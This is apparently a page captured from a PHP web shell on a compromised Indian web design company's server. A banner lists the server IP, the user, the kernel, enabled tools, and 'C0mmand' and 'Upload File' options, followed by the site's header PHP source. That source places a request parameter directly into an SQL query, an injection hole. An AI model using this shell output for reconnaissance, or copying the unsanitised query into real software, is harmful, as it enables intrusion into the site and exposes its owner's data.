Server IP : 103.53.40.154 / Your IP : 3.140.185.194 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/thewebshop.co.in/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php ob_start(); require_once("includes/dbsmain.inc.php"); $page_name=basename($_SERVER['PHP_SELF'],'.php'); include("site-main-query.php"); $sess_id=session_id(); $site_url=$compDATA['admin_website_url']; $author = str_replace("http://","","$site_url"); ?> <!DOCTYPE html> <html lang="en"> <head> <meta name="robots" content="index, follow" /> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="author" content="The Web Shop"> <meta name="google-site-verification" content="96ooUQ_ExeJq8AsJSqjRpKI9QfEejck4KvBDdTgHrus" /> <?php $meta_title=""; $meta_desc=""; $catID=db_scalar("select category_id from tbl_category where category_url='$_REQUEST[cat_name]'"); if($catID!="") { $meta_title=db_scalar("select category_meta_title from tbl_category where category_id='$catID'");; $meta_desc=db_scalar("select category_meta_description from tbl_category where category_id='$catID'");; }else{ if($page_name=="index") { $meta_title="Digital Marketing | Web Designing | Services in Delhi - The Web Shop"; $meta_desc="The Web Shop is the best company of Digital Marketing, Web Development and Web Designing, SSL Certificate Service and SEO Services in Delhi India."; } if($page_name=="about-us") { $meta_title="SSL Certificate | Content Writing Packages | Services in Delhi India"; $meta_desc="The Web Shop is one of the best SSL Certificate Service, Graphic Design and Content Writing Packages Services in Delhi India."; } if($page_name=="packages") { $meta_title="DIGITAL MARKETING PACKAGES - The Web Shop"; $meta_desc="DIGITAL MARKETING PACKAGES - Some Affordable Digital Marketing Packages In Delhi India."; } if($page_name=="contact") { $meta_title="The Web Shop in Delhi – Contact Us at +91-7065740676"; $meta_desc="Contact The Web Shop for any information suggestions and Services related query feel free to contact us Contact us."; } if($page_name=="terms-and-conditions") { $meta_title="The Web Shop in Delhi – Terms and Conditions"; $meta_desc="The Web Shop in Delhi – Terms and Conditions"; } if($page_name=="enquiry") { $meta_title="The Web Shop – Ask for free enquiry"; $meta_desc="The Web Shop for any enquiries and comments, you can contact us by phone and Enquiry form."; } if($page_name=="enquiry") { $meta_title="The Web Shop - PORTFOLIO"; $meta_desc="The Web Shop - PORTFOLIO"; } } ?> <title><?=$meta_title?></title> <meta name="keywords" content=""> <meta name="description" content="<?=$meta_desc?>"> <link rel="icon" href="images/fav.png" type="image/x-icon"> <!-- BOOTSTRAPE STYLESHEET CSS FILES --> <link rel="stylesheet" href="css/bootstrap.css"> <!-- JQUERY SELECT --> <link href="css/select2.min.css" rel="stylesheet" /> <!-- JQUERY MENU --> <link rel="stylesheet" href="css/megamenu.css"> <!-- ANIMATION --> <link rel="stylesheet" href="css/animate.min.css"> <!-- OWl CAROUSEL--> <link rel="stylesheet" href="css/owl.carousel.css"> <link rel="stylesheet" href="css/owl.style.css"> <link href="css/magnific-popup.css" rel="stylesheet"> <!-- TEMPLATE CORE CSS --> <link rel="stylesheet" href="css/style.css"> <!-- ICON FONTS --> <link rel="stylesheet" type="text/css" href="css/font-awesome.min.css"> <link rel="stylesheet" href="css/themify-icons.css" type="text/css"> <link rel="stylesheet" type="text/css" href="fonts/seo-and-marketing/flaticon.css"> <link rel="stylesheet" type="text/css" href="fonts/seo-icons/flaticon.css"> <!-- MASTER SLIDER --> <link rel="stylesheet" href="masterslider/css/masterslider.css"/> <link href="masterslider/css/style.css" rel='stylesheet' type='text/css'> <link rel="stylesheet" href="masterslider/css/layer-style.css"> <link href="masterslider/css/ms-staff-style.css" rel='stylesheet' type='text/css'> <!-- Google Fonts --> <link href="css/alegreya-font.css" rel="stylesheet"> <link href="css/sans-font.css" rel="stylesheet" type="text/css"> <style> .footer-bg{background-color:#db214c;} .social-bar li { display: inline-block; margin: 0 4px 0 0; background-color:#db214c; padding:5px 10px 4px 10px; transition:all 1.s; } .social-bar li:hover { background-color:#532c9c; transition:all 1.s; } .social-bar li a:hover{color:#fff} .footer-bg p{color:#fff} .mega-menu .menu-links > li > a { color: #191919; font-size: 14px; margin: 0; padding: 0 8px; display: inline-block; float: none; width: 100%; line-height: 64px; position: relative; text-transform: uppercase; font-weight: 600; } .header-top-right ul li { display: inline-block; padding: 0 7px; } /*******************/ .res-comp{display:none; margin:0px; padding:0px; background-color:#db214c;position:fixed; bottom:0px; width:100%;} .res-comp p a{color:#fff; font-weight:400; font-size:12px; text-align:center;} .bg-brd-sty{border-right:solid 1px #FFF; border-top:solid 1px #FFF;} .bg-brd-sty p{padding-top:2px; text-align:center} .bg-brd-sty a{color:#fff; font-weight:400; font-size:13px !important; text-align:center;} @media (min-width:320px) and (max-width:767px) { .res-comp{display:block;} } /*********************/ </style> <script type="application/ld+json"> { "@context": "https://schema.org", "@type": "Person", "name": "The Web Shop", "url": "http://thewebshop.co.in/", "sameAs": [ "http://www.facebook.com/Webshop.the/", "http://instagram.com/webshop.the/", "http://www.linkedin.com/in/webshop-the/", "https://twitter.com/Webshop_the" ] } </script> <!-- Global site tag (gtag.js) - Google Analytics --> <script async src="https://www.googletagmanager.com/gtag/js?id=G-ET05SHN7V8"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'G-ET05SHN7V8'); </script> </head>